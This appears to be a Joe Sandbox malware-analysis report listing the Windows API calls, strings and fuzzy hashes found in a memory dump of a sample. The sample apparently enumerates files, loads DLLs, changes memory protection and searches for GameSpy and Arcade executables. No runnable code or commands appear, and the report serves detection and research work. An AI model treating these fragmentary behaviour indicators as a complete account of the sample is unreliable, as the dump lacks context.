                                                                                                                        • Opcode Fuzzy Hash: cd8b76d4ab3ece41a87f241e506bef1def962168270d0846ba8206e87e42ead1
                                                                                                                        • Instruction Fuzzy Hash: 7C8125351087C68BC725DF249824BEBB7D5EFD3345F144A2AE8C587340EB39988AC795
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 00414684
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$First$CloseNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2001080981-438819550
                                                                                                                        • Opcode ID: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                        • Instruction ID: 72dfbb3d70468e9ec892d8d425d37a8d7061e44efa945190d4a59d62a0781805
                                                                                                                        • Opcode Fuzzy Hash: f01309ff1fd51b0ac24277021250d98bb08df7d23f875b14e1aae546966c7c90
                                                                                                                        • Instruction Fuzzy Hash: 465134351087C58BC725DF2498247EBB7D5FBD2305F144A2EE8C587341EB39988AC796
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 3541575487-1173974218
                                                                                                                        • Opcode ID: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                        • Instruction ID: 73ed92b0838a6fd84eecc73f45936914938e06500c24726ad6d6a21ef8ce5d97
                                                                                                                        • Opcode Fuzzy Hash: b971a40414e8ad980f72b527b3df65cccc3f835ededa111a898185c93d355f4f
                                                                                                                        • Instruction Fuzzy Hash: 14414C751087854BC721CB24A8147FBBBD5FBD2306F144929EDC587301EB39988AC7AA
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA), ref: 0040F690
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040F697
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0040F6AB
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0040F6CF
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0040F6EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$AddressDiskFreeHandleModuleProcSpace
                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                        • API String ID: 3160920872-3712701948
                                                                                                                        • Opcode ID: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                        • Instruction ID: 7ad7b93e94fca053afe9f72b981c6a2b3715ccf3ef72a9c3208e8f43e9ae2302
                                                                                                                        • Opcode Fuzzy Hash: b81541dc3e96a0be4577df6b92fbd7b30589bb316c3bcf877a1cbfb86ccf1b4f
                                                                                                                        • Instruction Fuzzy Hash: 13214336208302AFC311DF65D804F9B77E4BB96304F05897EF581A2150EA74D508CBA7
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000003,dll,?,?,774D0F00,00414AE2,?), ref: 004148DE
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 004148E7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 00414902
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0041490F
                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00414916
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLibraryMode$AddressFreeLoadProc
                                                                                                                        • String ID: DllRegisterServer$dll
                                                                                                                        • API String ID: 2523496102-3743520154
                                                                                                                        • Opcode ID: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                        • Instruction ID: 5463a6723183e0fd2573a7326bb506f65ba7a9fbe54e5d5f4bd9aa869cd4d228
                                                                                                                        • Opcode Fuzzy Hash: ef9ba2a5713ceb03e6ce70ee764b4726849faacc317d9aed7e31cc120d4455a1
                                                                                                                        • Instruction Fuzzy Hash: 7BE06C773812242B85116BE97C099CBF79CDFD77727024033FA00D3111CA65984596B9
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,0040F4C0), ref: 004158C6
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004158D5
                                                                                                                        • FindFirstFileA.KERNEL32(?,0040F4C0), ref: 0041592D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3541575487-438819550
                                                                                                                        • Opcode ID: 21b5e472a939dc88e613e68adea4ee27e28d7efdd7dda9c45b768cfd0e207bba
                                                                                                                        • Instruction ID: 82c4c8625ec48b706e964f5defe62e3f166b5be27307af7ce1f69a47df756571
                                                                                                                        • Opcode Fuzzy Hash: 21b5e472a939dc88e613e68adea4ee27e28d7efdd7dda9c45b768cfd0e207bba
                                                                                                                        • Instruction Fuzzy Hash: 9971B771208B86CBC725CB249450BFBB7E9BFC6345F544A2EE8CA87201DB359846C797
                                                                                                                        APIs
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 004146D5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0041472B
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0041478D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 3541575487-438819550
                                                                                                                        • Opcode ID: ff1870f39b35a9e64cf155c50654656466c85049f1f2ce81a176109cbe950176
                                                                                                                        • Instruction ID: 664cd25a3782574f27417e97decbe08ee3e65bcafea3b4704871a912b5d67fad
                                                                                                                        • Opcode Fuzzy Hash: ff1870f39b35a9e64cf155c50654656466c85049f1f2ce81a176109cbe950176
                                                                                                                        • Instruction Fuzzy Hash: 9D5114355087C58BD721DF2498247EBB7E5FFD2342F18492AE8C587340EB38988AC795
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040AC64
                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040ACB5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040AD05
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID: %s\%s$%s\Arcade*.exe$%s\GameSpy
                                                                                                                        • API String ID: 3541575487-1719408586
                                                                                                                        • Opcode ID: d67195a3238f5f57d1dd2343961741220b1b4093bba5da21d9414279efcebce8
                                                                                                                        • Instruction ID: ba2843077a888f8c0d9f31af973d8caf28e7bd1786c0ac93db22295fa0225a35
                                                                                                                        • Opcode Fuzzy Hash: d67195a3238f5f57d1dd2343961741220b1b4093bba5da21d9414279efcebce8
                                                                                                                        • Instruction Fuzzy Hash: 0B21E5721083006BE320EB90DC45FEB739DEBC4301F44892FBA55561C1EBBC620986AB
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 004142A8
                                                                                                                        • FindClose.KERNEL32(00000000,00000000,?,Found! (FileExists),00000000), ref: 004142D9
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414301
                                                                                                                        Strings
                                                                                                                        • FindFirstFile returned INVALID_HANDLE_VALUE, xrefs: 00414323
                                                                                                                        • File is a directory (FileExists), xrefs: 004142F3
                                                                                                                        • Found! (FileExists), xrefs: 004142CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$FileFirst
                                                                                                                        • String ID: File is a directory (FileExists)$FindFirstFile returned INVALID_HANDLE_VALUE$Found! (FileExists)
                                                                                                                        • API String ID: 3046750681-696252916
                                                                                                                        • Opcode ID: 9358b9d398efbeaedbf88955095f5e19847b83186bca4ece126a06245336cc21
                                                                                                                        • Instruction ID: f179452c76eb578ae544a1bee184078c8abbbeec53593ee830497973ded0bfe5
                                                                                                                        • Opcode Fuzzy Hash: 9358b9d398efbeaedbf88955095f5e19847b83186bca4ece126a06245336cc21
                                                                                                                        • Instruction Fuzzy Hash: 9C014E363812102AD5203B15AC16FEB67549BD7735F14002BFDA8B72D1C17E204ED67D
                                                                                                                        APIs
                                                                                                                        • _TranslateName.LIBCMT ref: 00430772
                                                                                                                        • _TranslateName.LIBCMT ref: 004307BB
                                                                                                                        • IsValidCodePage.KERNEL32(00000000,00000082,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 0043081F
                                                                                                                        • IsValidLocale.KERNEL32(00000001), ref: 00430835
                                                                                                                          • Part of subcall function 00430605: EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: NameTranslateValid$CodeEnumLocaleLocalesPageSystem
                                                                                                                        • String ID: Norwegian-Nynorsk
                                                                                                                        • API String ID: 25477102-461349085
                                                                                                                        • Opcode ID: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                        • Instruction ID: 2f20a2206e1c076148d7ff7e681dfdc67b3553f714d7ef80d5f25f58bdb4048b
                                                                                                                        • Opcode Fuzzy Hash: 1d989896bc01b99306157691cb7343851a378502ff2dffd7fc8ab0248d4c7af6
                                                                                                                        • Instruction Fuzzy Hash: 7B4119716112409BD7B0AF619CB1A2F37E0AF49300F156A3FE541963A1E72CB84DCB6E
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424096
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 004240A7
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004240ED
                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0042412B
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,0000001C), ref: 00424151
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4136887677-0
                                                                                                                        • Opcode ID: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                        • Instruction ID: 3ae70e2e835963f036367eda34e548a546d7b1799bd96947dc5649064c90c0b6
                                                                                                                        • Opcode Fuzzy Hash: f92df4dc610bf4f209ae5d1d387623058e6c3484833d4ddbf4b0e73c3023e66a
                                                                                                                        • Instruction Fuzzy Hash: 7531D476E00229ABDF10CBA4ED499EDBBB8EB45354F540066E901E3241D7348E91CB98
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0042D875
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        • GetTimeZoneInformation.KERNEL32(00480CC0,0044D5E0,00000018,0042DE77,0044D5F0,00000008,00429464,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 0042D986
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00480CC4,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0042DA14
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00480D18,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 0042DA48
                                                                                                                          • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                          • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1400400880-0
                                                                                                                        • Opcode ID: 168796f9be6af2e00a1e0c13e8481f7b6c1735c285c48e3457f2838ae12673e8
                                                                                                                        • Instruction ID: 9e62acca3ffd8af432368a2c5d68fbdb27d2d3598730482c6caa495fe8d037a2
                                                                                                                        • Opcode Fuzzy Hash: 168796f9be6af2e00a1e0c13e8481f7b6c1735c285c48e3457f2838ae12673e8
                                                                                                                        • Instruction Fuzzy Hash: 8E711570E082719ED7629B69FC41B5A7BE5EB55310FE4012FE090C72E2DB389986CB5C
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040F740: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0040F924
                                                                                                                        • CoCreateInstance.OLE32(0044EC20,00000000,00000001,0044EC10,?,00000001,?), ref: 0040F942
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040F9F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$CreateInitializeInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2531819542-0
                                                                                                                        • Opcode ID: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                        • Instruction ID: d74481e86e668fc06052e60e2a5e486a87dd0838d2a97d2aabe5d75d40d84abb
                                                                                                                        • Opcode Fuzzy Hash: c68482eb7b128df90b140a767d1cb684c16c794c4bf690cbe2601dcd45de4953
                                                                                                                        • Instruction Fuzzy Hash: FC3119B5204341AFD724CFA0C888E6BB7A9FFC9700F14896DF9459B291D635EC44CB65
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?), ref: 00414F47
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414F81
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414FA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$Close$FileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3046750681-0
                                                                                                                        • Opcode ID: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                        • Instruction ID: c85bec187cc915339fe74b88054a561c9c391bf97f991d5b0ad1c1012243f531
                                                                                                                        • Opcode Fuzzy Hash: aa1ead43bb4c2f5695caeebe89723ce1faa210caa242d16a477e1f9ee516e382
                                                                                                                        • Instruction Fuzzy Hash: CF219070205201CBD7258F15C854BEBB7E9AFC6325F14866DE4098B3A0D339D843CB95
                                                                                                                        APIs
                                                                                                                        • LoadResource.KERNEL32(?,?), ref: 004013DC
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 004013EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$LoadLock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1037334470-0
                                                                                                                        • Opcode ID: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                        • Instruction ID: 4ddbe79ddf29716ed0e0787d15bd08c75ff9431ae36c8441fcffb4845dcff88c
                                                                                                                        • Opcode Fuzzy Hash: 6a70bf04cb826fafab710c17c709d5ed6c2866ee02fa4e431fdbd7f5c5722625
                                                                                                                        • Instruction Fuzzy Hash: 62F0C83770026147CB305F69EC448ABB7D8EAD27A7705083FFD91E3261D238D84496A8
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32 ref: 004228A6
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004228B8
                                                                                                                        • GetACP.KERNEL32 ref: 004228E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4232894706-0
                                                                                                                        • Opcode ID: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                        • Instruction ID: 479ae5959c9c7c33de479cf2c97852b65f57573494026bee3456946d9841ba59
                                                                                                                        • Opcode Fuzzy Hash: 9a9126b5ab44d53eca08d5a37bef252a87b9afc98746b44ef76eb446818d1b29
                                                                                                                        • Instruction Fuzzy Hash: 1EF0AF31E00234ABC715EBA0E8145EF77A4BB06B41B5142A9E95297250D7B4AE09C799
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                        • Instruction ID: a4ee6ba57dd3c2eee595af29f84efc58c9f0a8231bf26c2dab4fe45ac8b8fa99
                                                                                                                        • Opcode Fuzzy Hash: 4e1850cb4fc369c31007ded812cf3d6bfb65e1af0afcb55ba6117de7e84e2072
                                                                                                                        • Instruction Fuzzy Hash: A7F03131310119BBCF059F61EE049AE7B6CAB01344B848426FD16D5121DBBCCA15DB5E
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 0042291C
                                                                                                                        • InterlockedExchange.KERNEL32(0045580C,Function_00022895), ref: 00422944
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlockedVersion
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2700998522-0
                                                                                                                        • Opcode ID: d51009fb6949f085d55bcad13a349f30658bd5cc0b6d4ae9d564e0fc4a49fac9
                                                                                                                        • Instruction ID: 88388f21cbd03abab0724f39be1b3b2730a59f37a07532d993b0e1a24bcad9ce
                                                                                                                        • Opcode Fuzzy Hash: d51009fb6949f085d55bcad13a349f30658bd5cc0b6d4ae9d564e0fc4a49fac9
                                                                                                                        • Instruction Fuzzy Hash: 9AF03774600324EBC720AF64EA0975DB7F4FB06305F9041F6E40992352DB748D888F19
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(0040B718,?), ref: 00413813
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00413828
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                        • Instruction ID: 4b0baa7c04ff5837cf594f603c76cd3553f5a9d2e9049aea6c7cfb4a64392fa4
                                                                                                                        • Opcode Fuzzy Hash: fddb500a4fd55824f664e50f501a9d257236d6138bad59b67ceea46b7ef6f083
                                                                                                                        • Instruction Fuzzy Hash: D6E0C2B94442402BC200EF35D948AEB77D95B52722F049A1AFCA8822E0D23D984DDA2A
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00414353
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00414368
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                        • Instruction ID: d18f64121f5c3201ee76a233fb6b76ca38dcc0ed17e5b9cd94885203bfb14983
                                                                                                                        • Opcode Fuzzy Hash: 19d72f97b7d99f620658749f6876cd35770fc52d9dde7e14b69d7df5d49c560f
                                                                                                                        • Instruction Fuzzy Hash: 51E0C2B51442442BC2058F34D948AEB77996B82721F048A1ABCB8822E0E23D884DDA3A
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesA.KERNEL32(00430320,00000001,00000000,?), ref: 004306A1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                        • Instruction ID: 54d17df95efd4fea5ab28ce8627b56d0c3c169f5056bfa7745a835ac7e03007b
                                                                                                                        • Opcode Fuzzy Hash: 30d1be683f272a08c0790b8b21df16f6b30667fd3acbf257a54d3f9a0b35c831
                                                                                                                        • Instruction Fuzzy Hash: 41F03C715713019EDBD0DFB8ED2A7693BE1EB85304F506A3EE841822A5C778649E8B0C
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006), ref: 00432571
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: 4d72925202115b99d5d7b8f4edc631b23003b5100efdd5749bbc6799c76358c4
                                                                                                                        • Instruction ID: 17f76300287a7d19cbd26b08af8320322d1628fa1681537f1a47a6f7f2395bee
                                                                                                                        • Opcode Fuzzy Hash: 4d72925202115b99d5d7b8f4edc631b23003b5100efdd5749bbc6799c76358c4
                                                                                                                        • Instruction Fuzzy Hash: 2EE09231B04208BBCB00EBB4ED01B9D77B8AB04318F1042A6F520D72C0EBB496048B59
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesA.KERNEL32(0043053A,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430700
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 4c4d0a780be8e05bee1ffec57aaebf5c88fa93bafd2c860e70af7c595655c8b2
                                                                                                                        • Instruction ID: f2d345d28478ef9a94cd778bf2c05c4241d0faeb395d53aab50563b5c18227a9
                                                                                                                        • Opcode Fuzzy Hash: 4c4d0a780be8e05bee1ffec57aaebf5c88fa93bafd2c860e70af7c595655c8b2
                                                                                                                        • Instruction Fuzzy Hash: 77E09AB25B12409ED7909FB1FC1632D3BD1FB85708F505A3EE440822E6C7782488CB1C
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesA.KERNEL32(0043021B,00000001,00000000,004562C0,0042635F,?,004809CC,?,?,00000000,?), ref: 00430625
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2099609381-0
                                                                                                                        • Opcode ID: 60c3cef7e41813c81970e8aa371923ba75d1669c9be8994eebbc24ba15ed5b1e
                                                                                                                        • Instruction ID: c519572493f4ad7763061febfb11964ecb3e895afacb9612d552e624a332fddb
                                                                                                                        • Opcode Fuzzy Hash: 60c3cef7e41813c81970e8aa371923ba75d1669c9be8994eebbc24ba15ed5b1e
                                                                                                                        • Instruction Fuzzy Hash: 6AD05EB0A603046EE7C08FB0BC597693AE0FF81B14F60AA6ED941810E0C6791889C70C
                                                                                                                        Strings
